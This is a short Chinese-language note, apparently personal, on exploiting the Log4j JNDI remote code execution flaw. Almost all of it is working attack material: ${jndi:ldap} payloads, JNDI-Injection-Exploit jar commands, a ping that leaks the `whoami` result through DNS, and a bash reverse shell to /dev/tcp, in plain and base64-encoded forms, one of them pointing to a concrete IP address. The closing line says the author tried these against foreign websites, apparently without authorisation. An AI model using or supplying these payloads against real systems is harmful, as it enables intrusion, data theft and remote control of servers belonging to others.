log4j_rce利用

程序在使用日志读取用户输入时，攻击者可以构造恶意代码${}

${jndi:ldap://f03b65e6.dns.1433.eu.org./exp}

1.7

${jndi:ldap://IP:1389/shzltp}
ldap://IP:1389/shzltp

1.8
${jndi:ldap://IP:1389/ojzxns}
ldap://IP:1389/ojzxns



java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash转码" -A  IP

ping `whoami`.48f3ebc4.dns.1433.eu.org.
bash -c {echo,cGluZyBgd2hvYW1pYC5mMDNiNjVlNi5kbnMuMTQzMy5ldS5vcmcu}|{base64,-d}|{bash,-i}


java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,cGluZyBgd2hvYW1pYC5mMDNiNjVlNi5kbnMuMTQzMy5ldS5vcmcu}|{base64,-d}|{bash,-i}" -A  IP


bash -i >& /dev/tcp/IP/3344 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80NS43Ni4yMjMuNTUvMzM0NCAwPiYx}|{base64,-d}|{bash,-i}

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80NS43Ni4yMjMuNTUvMzM0NCAwPiYx}|{base64,-d}|{bash,-i}"  -A  IP

感觉对于一些小型企业基本不会去使用这个东西，对于大型站点可能会去使用，但是往往他们的防护也及时，今天下午试了一些国外站点，基本上都不出网没法成功利用。。。